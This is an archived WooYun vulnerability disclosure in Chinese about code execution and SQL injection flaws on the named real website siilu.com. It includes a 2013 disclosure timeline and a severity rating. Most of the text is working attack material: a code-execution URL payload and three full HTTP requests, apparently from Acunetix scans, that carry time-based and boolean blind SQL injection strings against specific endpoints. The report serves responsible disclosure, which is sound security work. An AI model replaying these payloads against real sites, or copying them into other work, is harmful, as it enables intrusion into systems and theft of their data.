乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-03-15: 细节已通知厂商并且等待厂商处理中 2013-03-19: 厂商已经确认,细节仅向厂商公开 2013-03-29: 细节向核心白帽子及相关领域专家公开 2013-04-08: 细节向普通白帽子公开 2013-04-18: 细节向实习白帽子公开 2013-04-29: 细节向公众公开
亿邦动力网某网站代码执行漏洞
代码执行漏洞:
http://www.siilu.com//shop/100501/infocase/%24%7b%40print(md5(admin))%7d
SQL盲注3枚:
POST /companyuser/dob2b HTTP/1.1Content-Length: 1540Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_FBRHYGUKBCX-Requested-With: XMLHttpRequestReferer: http://www.siilu.com:80/Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0Host: www.siilu.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IXNSIQEDQH-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="city"0-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="company_site"Acunetix-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="contact"1-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="mail"[email protected]-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="pass2"g00dPa$$w0rD-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="pass_word"g00dPa$$w0rD-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="phone"555-666-0606-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="phone1"555-666-0606-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="province"0-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="qq"1-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="telphone"555-666-0606-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="usertype"-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="user_name"kgoyghag' or (sleep(2)+1) limit 1 -- -------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="__hash__"54c0fa6632d2db7653113cafae62bb45-------AcunetixBoundary_IXNSIQEDQHContent-Disposition: form-data; name="logo"; filename=""Content-Type: -------AcunetixBoundary_IXNSIQEDQH--
http://www.siilu.com/index/clue?clueid=-1%20or%2011=11
GET /product/topcategory/?category_id=-1'%20or%20'91'%3d'92&city=&pagenum=4&sorted= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.siilu.com:80/Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0Host: www.siilu.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept: */*
GET /ques/getfaq/?f=ajax&quesid=-1%20or%20100%3d98 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.siilu.com:80/Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0Host: www.siilu.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept: */*
危害等级:中
漏洞Rank:6
确认时间:2013-03-19 12:58
感谢lucky
暂无